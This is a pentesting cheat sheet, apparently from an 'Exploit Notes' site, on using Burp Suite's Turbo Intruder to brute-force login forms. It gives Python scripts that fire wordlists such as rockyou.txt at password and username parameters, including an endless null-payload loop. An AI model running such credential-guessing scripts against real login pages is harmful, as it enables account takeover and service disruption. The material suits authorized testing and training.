Exploit Notes

Turbo Intruder in Burp Suite

Last modified: 2023-08-14

Web

Turbo Intruder is the Burp Suite extension for brute forcing or fuzzing to websites.

Using Single Parameter

Set ā€œ%sā€ to the parameter for brute force.
For example, set %s as the value of password then we can brute force to password.

POST /login HTTP/1.1
...

username=admin&password=%s

Here is the Python cheat sheet. We can use either code depending on the situation.

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                        concurrentConnections=5,
                        requestsPerConnection=5,
                        pipeline=False
                        )

    # Brute force (wordlist)
    for word in open('/usr/share/wordlists/rockyou.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute force (0 - 255)
    for i in range(0, 255):
        engine.queue(target.req, str(i))

    # Brute force (0000 - 9999)
    for word in open('/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute Force (alphabet)
    for word in open('/usr/share/seclists/Fuzzing/char.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute Force (alphanum upper-lower)
    for word in open('/usr/share/seclists/Fuzzing/alphanum-case.txt'):
        engine.queue(target.req, word.rstrip())

    # Null payloads (infinite loop)
    i = 0
    while i < 1:
        engine.queue(target.req, None)

    # Null payloads (100 loops)
    i = 0
    while i < 100:
        engine.queue(target.req, None)
        i += 1


def handleResponse(req, interesting):
    if interesting:
        table.add(req)

Using Multiple Parameters

In addition to simple parameter, we can apply multiple parameters e.g. username and password.

POST /login HTTP/1.1
...

username=%s&password=%s

Here is the Python script. We need to apply multiple words for each parameter as below.

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                        concurrentConnections=5,
                        requestsPerConnection=100,
                        pipeline=False)

    # Set multiple words for parameters.
    for word1 in open('/path/to/usernames'):
        for word2 in open('/path/to/passwords'):
            engine.queue(target.req, [word1.rstrip(), word2.rstrip()])


def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if req.status != 404:
        table.add(req)